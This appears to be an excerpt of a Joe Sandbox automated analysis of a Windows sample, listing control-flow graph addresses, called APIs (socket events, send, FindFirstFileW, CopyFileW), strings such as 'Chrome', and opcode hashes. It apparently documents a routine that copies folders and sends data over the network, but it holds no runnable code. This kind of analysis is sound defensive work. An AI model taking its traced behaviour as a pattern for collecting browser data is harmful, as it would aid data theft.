3032 7ff7f129d932-7ff7f129d93f 3013->3032 3033 7ff7f129d929-7ff7f129d92e 3013->3033 3016->3006 3027 7ff7f129d81b-7ff7f129d82b 3016->3027 3022 7ff7f129d8ba-7ff7f129d8c1 3017->3022 3023 7ff7f129d86c-7ff7f129d8a0 getsockopt 3017->3023 3030 7ff7f129d8e1-7ff7f129d8ef 3022->3030 3031 7ff7f129d8c3-7ff7f129d8df WSAEventSelect 3022->3031 3023->3022 3028 7ff7f129d8a2-7ff7f129d8a7 3023->3028 3024->2999 3024->3000 3027->3011 3027->3016 3028->3022 3036 7ff7f129d8a9-7ff7f129d8b4 send 3028->3036 3030->3013 3038 7ff7f129d8f1-7ff7f129d8fc 3030->3038 3031->3006 3031->3030 3034 7ff7f129d945-7ff7f129d947 3032->3034 3035 7ff7f129da28-7ff7f129da32 call 7ff7f12c4840 3032->3035 3033->3032 3039 7ff7f129db95-7ff7f129db98 3034->3039 3040 7ff7f129d94d 3034->3040 3045 7ff7f129da37-7ff7f129da3c 3035->3045 3036->3022 3038->3017 3043 7ff7f129db9a 3039->3043 3044 7ff7f129db9e-7ff7f129dba5 3039->3044 3042 7ff7f129d950-7ff7f129d96f WSAWaitForMultipleEvents 3040->3042 3046 7ff7f129d975-7ff7f129d97a 3042->3046 3043->3044 3044->3009 3047 7ff7f129dba7-7ff7f129dba9 3044->3047 3048 7ff7f129da49 3045->3048 3049 7ff7f129da3e-7ff7f129da44 3045->3049 3051 7ff7f129d980-7ff7f129d995 3046->3051 3052 7ff7f129dac7-7ff7f129dacc 3046->3052 3047->3009 3053 7ff7f129dbab-7ff7f129dbad 3047->3053 3048->3042 3050 7ff7f129da4f-7ff7f129da5d 3048->3050 3049->3009 3050->3046 3056 7ff7f129d9a0-7ff7f129d9cb WSAEnumNetworkEvents 3051->3056 3054 7ff7f129dad2-7ff7f129dae3 call 7ff7f12a04c0 3052->3054 3055 7ff7f129db76-7ff7f129db90 WSAResetEvent 3052->3055 3053->3009 3057 7ff7f129dbaf-7ff7f129dbbc 3053->3057 3054->3055 3067 7ff7f129dae9 3054->3067 3055->3039 3059 7ff7f129da62-7ff7f129da75 WSAEventSelect 3056->3059 3060 7ff7f129d9d1-7ff7f129da05 3056->3060 3057->3009 3061 7ff7f129dbbe-7ff7f129dbc6 3057->3061 3062 7ff7f129da77-7ff7f129daa9 3059->3062 3063 7ff7f129daad-7ff7f129dac1 3059->3063 3060->3059 3065 7ff7f129da07-7ff7f129da0a 3060->3065 3061->3009 3066 7ff7f129dbc8-7ff7f129dbdb call 7ff7f129d570 3061->3066 3062->3063 3063->3052 3063->3056 3065->3059 3068 7ff7f129da0c-7ff7f129da0f 3065->3068 3066->3009 3073 7ff7f129dbdd-7ff7f129dbe3 3066->3073 3071 7ff7f129daf0-7ff7f129db04 call 7ff7f12a04b0 3067->3071 3068->3059 3072 7ff7f129da11-7ff7f129da23 WSAEventSelect 3068->3072 3079 7ff7f129db06-7ff7f129db0d 3071->3079 3080 7ff7f129db5e-7ff7f129db70 call 7ff7f12a0750 3071->3080 3072->3063 3073->3009 3075 7ff7f129dbe5-7ff7f129dbed 3073->3075 3077 7ff7f129dbef-7ff7f129dbf1 3075->3077 3078 7ff7f129dbf3 3075->3078 3077->3078 3081 7ff7f129dbf6-7ff7f129dbf9 call 7ff7f12c4f20 3077->3081 3078->3081 3083 7ff7f129db10-7ff7f129db25 WSAEnumNetworkEvents 3079->3083 3080->3055 3080->3071 3081->3009 3086 7ff7f129db27-7ff7f129db2c 3083->3086 3087 7ff7f129db3b-7ff7f129db5c WSAEventSelect 3083->3087 3086->3087 3088 7ff7f129db2e-7ff7f129db31 3086->3088 3087->3080 3087->3083 3088->3087 3089 7ff7f129db33-7ff7f129db37 3088->3089 3089->3087 3090 7ff7f129db39 3089->3090 3090->3087
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 83a38fbdad7adf8659530e20145e2e1a13004aa8084da6f4a92534fafecafdf5
                    • Instruction ID: 45f13a2858bd3e9edd8c5a2e8d06684b7c136e5e74db782ace092aacff36ff4b
                    • Opcode Fuzzy Hash: 83a38fbdad7adf8659530e20145e2e1a13004aa8084da6f4a92534fafecafdf5
                    • Instruction Fuzzy Hash: 7FE1D632B0868682EB54AB59E4507BAE7A1FF44794FC00035EE5D83AD4DFBCE440EB90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3091 7ff7f132773c-7ff7f1327777 call 7ff7f13270c4 call 7ff7f13270cc call 7ff7f1327134 3098 7ff7f132777d-7ff7f1327788 call 7ff7f13270d4 3091->3098 3099 7ff7f13279a1-7ff7f13279ed call 7ff7f1303258 call 7ff7f13270c4 call 7ff7f13270cc call 7ff7f1327134 3091->3099 3098->3099 3105 7ff7f132778e-7ff7f1327798 3098->3105 3125 7ff7f1327b2b-7ff7f1327b99 call 7ff7f1303258 call 7ff7f131fee8 3099->3125 3126 7ff7f13279f3-7ff7f13279fe call 7ff7f13270d4 3099->3126 3107 7ff7f13277ba-7ff7f13277be 3105->3107 3108 7ff7f132779a-7ff7f132779d 3105->3108 3109 7ff7f13277c1-7ff7f13277c9 3107->3109 3111 7ff7f13277a0-7ff7f13277ab 3108->3111 3109->3109 3114 7ff7f13277cb-7ff7f13277de call 7ff7f131b604 3109->3114 3112 7ff7f13277ad-7ff7f13277b4 3111->3112 3113 7ff7f13277b6-7ff7f13277b8 3111->3113 3112->3111 3112->3113 3113->3107 3116 7ff7f13277e7-7ff7f13277f5 3113->3116 3121 7ff7f13277e0-7ff7f13277e2 call 7ff7f131b6e0 3114->3121 3122 7ff7f13277f6-7ff7f1327802 call 7ff7f131b6e0 3114->3122 3121->3116 3133 7ff7f1327809-7ff7f1327811 3122->3133 3145 7ff7f1327ba7-7ff7f1327baa 3125->3145 3146 7ff7f1327b9b-7ff7f1327ba2 3125->3146 3126->3125 3136 7ff7f1327a04-7ff7f1327a0f call 7ff7f1327104 3126->3136 3133->3133 3134 7ff7f1327813-7ff7f1327824 call 7ff7f13219e8 3133->3134 3134->3099 3144 7ff7f132782a-7ff7f1327880 call 7ff7f1333300 * 4 call 7ff7f1327658 3134->3144 3136->3125 3143 7ff7f1327a15-7ff7f1327a38 call 7ff7f131b6e0 GetTimeZoneInformation 3136->3143 3159 7ff7f1327a3e-7ff7f1327a5f 3143->3159 3160 7ff7f1327b00-7ff7f1327b2a call 7ff7f13270bc call 7ff7f13270ac call 7ff7f13270b4 3143->3160 3203 7ff7f1327882-7ff7f1327886 3144->3203 3147 7ff7f1327bac 3145->3147 3148 7ff7f1327be1-7ff7f1327bf4 call 7ff7f131b604 3145->3148 3151 7ff7f1327c37-7ff7f1327c3a 3146->3151 3152 7ff7f1327baf 3147->3152 3169 7ff7f1327bff-7ff7f1327c1a call 7ff7f131fee8 3148->3169 3170 7ff7f1327bf6 3148->3170 3151->3152 3156 7ff7f1327c40-7ff7f1327c48 call 7ff7f132773c 3151->3156 3157 7ff7f1327bb4-7ff7f1327be0 call 7ff7f131b6e0 call 7ff7f12fa740 3152->3157 3158 7ff7f1327baf call 7ff7f13279b8 3152->3158 3156->3157 3158->3157 3164 7ff7f1327a6a-7ff7f1327a71 3159->3164 3165 7ff7f1327a61-7ff7f1327a67 3159->3165 3172 7ff7f1327a73-7ff7f1327a7b 3164->3172 3173 7ff7f1327a85 3164->3173 3165->3164 3186 7ff7f1327c1c-7ff7f1327c1f 3169->3186 3187 7ff7f1327c21-7ff7f1327c33 call 7ff7f131b6e0 3169->3187 3177 7ff7f1327bf8-7ff7f1327bfd call 7ff7f131b6e0 3170->3177 3172->3173 3179 7ff7f1327a7d-7ff7f1327a83 3172->3179 3182 7ff7f1327a87-7ff7f1327afb call 7ff7f1333300 * 4 call 7ff7f1318548 call 7ff7f1327c50 * 2 3173->3182 3177->3147 3179->3182 3182->3160 3186->3177 3187->3151 3206 7ff7f1327888 3203->3206 3207 7ff7f132788c-7ff7f1327890 3203->3207 3206->3207 3207->3203 3209 7ff7f1327892-7ff7f13278b7 call 7ff7f1305904 3207->3209 3215 7ff7f13278ba-7ff7f13278be 3209->3215 3217 7ff7f13278cd-7ff7f13278d1 3215->3217 3218 7ff7f13278c0-7ff7f13278cb 3215->3218 3217->3215 3218->3217 3220 7ff7f13278d3-7ff7f13278d7 3218->3220 3222 7ff7f1327958-7ff7f132795c 3220->3222 3223 7ff7f13278d9-7ff7f1327901 call 7ff7f1305904 3220->3223 3224 7ff7f132795e-7ff7f1327960 3222->3224 3225 7ff7f1327963-7ff7f1327970 3222->3225 3231 7ff7f132791f-7ff7f1327923 3223->3231 3232 7ff7f1327903 3223->3232 3224->3225 3227 7ff7f132798b-7ff7f132799a call 7ff7f13270bc call 7ff7f13270ac 3225->3227 3228 7ff7f1327972-7ff7f1327988 call 7ff7f1327658 3225->3228 3227->3099 3228->3227 3231->3222 3237 7ff7f1327925-7ff7f1327943 call 7ff7f1305904 3231->3237 3235 7ff7f1327906-7ff7f132790d 3232->3235 3235->3231 3239 7ff7f132790f-7ff7f132791d 3235->3239 3243 7ff7f132794f-7ff7f1327956 3237->3243 3239->3231 3239->3235 3243->3222 3244 7ff7f1327945-7ff7f1327949 3243->3244 3244->3222 3245 7ff7f132794b 3244->3245 3245->3243
                    APIs
                    • _get_daylight.LIBCMT ref: 00007FF7F1327781
                      • Part of subcall function 00007FF7F13270D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13270E8
                      • Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
                      • Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700
                      • Part of subcall function 00007FF7F1303258: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F1303207,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F1303261
                      • Part of subcall function 00007FF7F1303258: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F1303207,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F1303286
                    • _get_daylight.LIBCMT ref: 00007FF7F1327770
                      • Part of subcall function 00007FF7F1327134: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1327148
                    • _get_daylight.LIBCMT ref: 00007FF7F13279E6
                    • _get_daylight.LIBCMT ref: 00007FF7F13279F7
                    • _get_daylight.LIBCMT ref: 00007FF7F1327A08
                    • GetTimeZoneInformation.KERNELBASE ref: 00007FF7F1327A2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                    • String ID: Eastern Standard Time$Eastern Summer Time
                    • API String ID: 4070488512-239921721
                    • Opcode ID: a33450d96af1aa2e880c706dc29fa5b9d6af31b85af25cd50543b27ca5e56a2e
                    • Instruction ID: 1d5e78ec56087e0f7f40103f40b6d4551a3402952ce32e9049fde2e404b851dd
                    • Opcode Fuzzy Hash: a33450d96af1aa2e880c706dc29fa5b9d6af31b85af25cd50543b27ca5e56a2e
                    • Instruction Fuzzy Hash: CBD1CF22A0828287EB24FF25D8515B9A761FFA5794F81803DEA6D476C5DFBCF441C3A0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3305 7ff7f1311ed0-7ff7f1311f43 call 7ff7f1311a90 3308 7ff7f1311f5d-7ff7f1311f67 call 7ff7f131cccc 3305->3308 3309 7ff7f1311f45-7ff7f1311f4e call 7ff7f130b5d0 3305->3309 3315 7ff7f1311f69-7ff7f1311f80 call 7ff7f130b5d0 call 7ff7f130b5f0 3308->3315 3316 7ff7f1311f82-7ff7f1311feb CreateFileW 3308->3316 3314 7ff7f1311f51-7ff7f1311f58 call 7ff7f130b5f0 3309->3314 3328 7ff7f131229e-7ff7f13122be 3314->3328 3315->3314 3319 7ff7f1312068-7ff7f1312073 GetFileType 3316->3319 3320 7ff7f1311fed-7ff7f1311ff3 3316->3320 3322 7ff7f1312075-7ff7f13120b0 GetLastError call 7ff7f130b564 CloseHandle 3319->3322 3323 7ff7f13120c6-7ff7f13120cd 3319->3323 3325 7ff7f1312035-7ff7f1312063 GetLastError call 7ff7f130b564 3320->3325 3326 7ff7f1311ff5-7ff7f1311ff9 3320->3326 3322->3314 3339 7ff7f13120b6-7ff7f13120c1 call 7ff7f130b5f0 3322->3339 3331 7ff7f13120cf-7ff7f13120d3 3323->3331 3332 7ff7f13120d5-7ff7f13120d8 3323->3332 3325->3314 3326->3325 3333 7ff7f1311ffb-7ff7f1312033 CreateFileW 3326->3333 3337 7ff7f13120de-7ff7f1312133 call 7ff7f131cbe4 3331->3337 3332->3337 3338 7ff7f13120da 3332->3338 3333->3319 3333->3325 3343 7ff7f1312152-7ff7f1312183 call 7ff7f1311810 3337->3343 3344 7ff7f1312135-7ff7f1312141 call 7ff7f1311c98 3337->3344 3338->3337 3339->3314 3351 7ff7f1312189-7ff7f13121cb 3343->3351 3352 7ff7f1312185-7ff7f1312187 3343->3352 3344->3343 3350 7ff7f1312143 3344->3350 3353 7ff7f1312145-7ff7f131214d call 7ff7f13183e0 3350->3353 3354 7ff7f13121ed-7ff7f13121f8 3351->3354 3355 7ff7f13121cd-7ff7f13121d1 3351->3355 3352->3353 3353->3328 3358 7ff7f131229c 3354->3358 3359 7ff7f13121fe-7ff7f1312202 3354->3359 3355->3354 3357 7ff7f13121d3-7ff7f13121e8 3355->3357 3357->3354 3358->3328 3359->3358 3360 7ff7f1312208-7ff7f131224d CloseHandle CreateFileW 3359->3360 3362 7ff7f131224f-7ff7f131227d GetLastError call 7ff7f130b564 call 7ff7f131ce0c 3360->3362 3363 7ff7f1312282-7ff7f1312297 3360->3363 3362->3363 3363->3358
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                    • String ID:
                    • API String ID: 1617910340-0
                    • Opcode ID: fd34c9500abfcdaeb8b281bdda49ef4c881943f8d7a5923bb274d341d9b2ca53
                    • Instruction ID: dd449706726795b3b04b6dc7ab4a0c2c20d12a5704c9a2feab9fabf3dc3c30c9
                    • Opcode Fuzzy Hash: fd34c9500abfcdaeb8b281bdda49ef4c881943f8d7a5923bb274d341d9b2ca53
                    • Instruction Fuzzy Hash: 8AC1C036B18A4186EB50EF65C4906AC7761FB49BA8F510339DE2EA73D4CF78E055C390

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3448 7ff7f13306c8-7ff7f133072f call 7ff7f1290040 FindFirstFileW 3451 7ff7f1330901 3448->3451 3452 7ff7f1330735 3448->3452 3453 7ff7f1330903-7ff7f133092e call 7ff7f128f840 3451->3453 3454 7ff7f1330737-7ff7f133074d 3452->3454 3456 7ff7f1330751-7ff7f1330759 3454->3456 3456->3456 3458 7ff7f133075b-7ff7f13307dd call 7ff7f128f8e8 call 7ff7f1290040 call 7ff7f12900b4 call 7ff7f128f840 call 7ff7f1290040 call 7ff7f12900b4 call 7ff7f128f840 call 7ff7f1296068 3456->3458 3475 7ff7f133087d-7ff7f133089b call 7ff7f128f840 * 2 3458->3475 3476 7ff7f13307e3-7ff7f13307f6 call 7ff7f1296068 3458->3476 3487 7ff7f133089d-7ff7f13308b4 3475->3487 3488 7ff7f13308d4-7ff7f13308f2 FindNextFileW 3475->3488 3476->3475 3482 7ff7f13307fc-7ff7f1330800 3476->3482 3484 7ff7f133084c-7ff7f1330875 CopyFileW 3482->3484 3485 7ff7f1330802-7ff7f1330811 call 7ff7f13300c8 3482->3485 3486 7ff7f1330877 3484->3486 3485->3475 3498 7ff7f1330813-7ff7f133082d CreateDirectoryW 3485->3498 3486->3475 3490 7ff7f133092f-7ff7f133094d call 7ff7f128f840 * 2 3486->3490 3491 7ff7f13308cf call 7ff7f12fa2bc 3487->3491 3492 7ff7f13308b6-7ff7f13308c9 3487->3492 3488->3454 3494 7ff7f13308f8-7ff7f13308fb FindClose 3488->3494 3507 7ff7f1330982-7ff7f1330991 3490->3507 3508 7ff7f133094f-7ff7f1330966 3490->3508 3491->3488 3492->3491 3496 7ff7f1330996-7ff7f133099b call 7ff7f1303228 3492->3496 3494->3451 3498->3490 3501 7ff7f1330833-7ff7f133084a call 7ff7f13306c8 3498->3501 3501->3486 3507->3453 3509 7ff7f1330968-7ff7f133097b 3508->3509 3510 7ff7f133097d call 7ff7f12fa2bc 3508->3510 3509->3496 3509->3510 3510->3507
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: FileFind$CloseCopyCreateDirectoryFirstNext_invalid_parameter_noinfo_noreturn
                    • String ID: .
                    • API String ID: 3705515249-248832578
                    • Opcode ID: 413fab0995a673023f21fbb1f280d7141dad5b4c36602a17f107362addef8a12
                    • Instruction ID: f76446d7fc6f64fc3ce0695eda28e911f16ef730e13adf18781f1854c0ad773e
                    • Opcode Fuzzy Hash: 413fab0995a673023f21fbb1f280d7141dad5b4c36602a17f107362addef8a12
                    • Instruction Fuzzy Hash: ED71FA22B1864192EB10EB64D4501ADB371FF84794FC04235EABD87AE9DFBDD604C794
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID: .
                    • API String ID: 1974802433-248832578
                    • Opcode ID: b8c23b5692b34cac17de8e90af550be74194995407c4cd79832b65e7be966abf
                    • Instruction ID: 815f751769225cb86ba97e4cad979d569186d4b3cbc652a4dc09a760bd7f4fa1
                    • Opcode Fuzzy Hash: b8c23b5692b34cac17de8e90af550be74194995407c4cd79832b65e7be966abf
                    • Instruction Fuzzy Hash: 3641D622614682C6EB21EF24D4402B9B3B1FF44B94FD48235DA6D436D4EFBDD646D3A0
                    APIs
                    • _get_daylight.LIBCMT ref: 00007FF7F13279E6
                      • Part of subcall function 00007FF7F1327134: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1327148
                    • _get_daylight.LIBCMT ref: 00007FF7F13279F7
                      • Part of subcall function 00007FF7F13270D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13270E8
                    • _get_daylight.LIBCMT ref: 00007FF7F1327A08
                      • Part of subcall function 00007FF7F1327104: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1327118
                      • Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
                      • Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700
                    • GetTimeZoneInformation.KERNELBASE ref: 00007FF7F1327A2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                    • String ID: Eastern Standard Time$Eastern Summer Time
                    • API String ID: 3458911817-239921721
                    • Opcode ID: 5d4c3bf6b6aaf0ba4b5468b8752146ec1e6801c405154a876208c51c19d7efd6
                    • Instruction ID: 7dd8f206a9baa6ce83abda386ee1bfec13b7ac4056ef7c70395babe1c9c393f2
                    • Opcode Fuzzy Hash: 5d4c3bf6b6aaf0ba4b5468b8752146ec1e6801c405154a876208c51c19d7efd6
                    • Instruction Fuzzy Hash: 5B51AE32A0828287E714FF21E8914A9A760BF59784F81913DEA6D437D6DFBCF40087E0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: FolderPath_invalid_parameter_noinfo_noreturn
                    • String ID: Chrome
                    • API String ID: 2457504600-4269441498
                    • Opcode ID: 025a7543dcaefcd56463fb449fdd73668f18795f957d96d6e010195b199e1f01
                    • Instruction ID: 8b45fe000453fed86ca6725dff3b9423ab03300f2d37d4738ba0649ef9afa14b
                    • Opcode Fuzzy Hash: 025a7543dcaefcd56463fb449fdd73668f18795f957d96d6e010195b199e1f01
                    • Instruction Fuzzy Hash: 56C1C8A2E14BC6C6E700EB35D8415F5A3A1FFA5344F91633AE9AC525A5DFBCE180C390
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ioctlsocketrecv
                    • String ID: cf_socket_shutdown(%qd)
                    • API String ID: 2464938158-3341341643
                    • Opcode ID: 3564b6c4b1e63f81f7ad3baa9cb07198358acca60385551eba4acc3a7f55c14b
                    • Instruction ID: 63812a873e3e5f79d09869a023c5de1a11c8f9438ef9e9ad398bf276dd2bea63
                    • Opcode Fuzzy Hash: 3564b6c4b1e63f81f7ad3baa9cb07198358acca60385551eba4acc3a7f55c14b
                    • Instruction Fuzzy Hash: 4C11E961B089C281EB60EB65E4103A5A7A1FF48B98FD44231CF7C477C5DF6CD0428754
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: Resolving timed out after %lld milliseconds$operation aborted by pre-request callback
                    • API String ID: 0-247252918
                    • Opcode ID: 99bbcce2f50605d7cfe9c0f9af8885c8a63b67e3c0ec2013374b87cd621a2a9e
                    • Instruction ID: 2bcfde1f40c0573b1304b59fe944cf911a9d1d9ad3d15c56369067915522940f
                    • Opcode Fuzzy Hash: 99bbcce2f50605d7cfe9c0f9af8885c8a63b67e3c0ec2013374b87cd621a2a9e
                    • Instruction Fuzzy Hash: C7D18671B0868641FB14BBAD94502B9A3A0FF45B98FC45135CE2D876D5DFBCE440E3A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuery
                    • String ID: Resolving timed out after %lld milliseconds
                    • API String ID: 2783962273-1439975193
                    • Opcode ID: bdf21a975d96782dadc5c432ecb92f77df1112ed0731fe6454f5ee1efa9b6b94
                    • Instruction ID: 7f6cb38e43f7db90119fb92c82381865f7d91d4bdda9cf570cfbaddd8c383cfc
                    • Opcode Fuzzy Hash: bdf21a975d96782dadc5c432ecb92f77df1112ed0731fe6454f5ee1efa9b6b94
                    • Instruction Fuzzy Hash: E5E1B361B0868681FB14EBADD0012B9A360FF45B98FC44131DE6D876D9DFBDE445E3A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
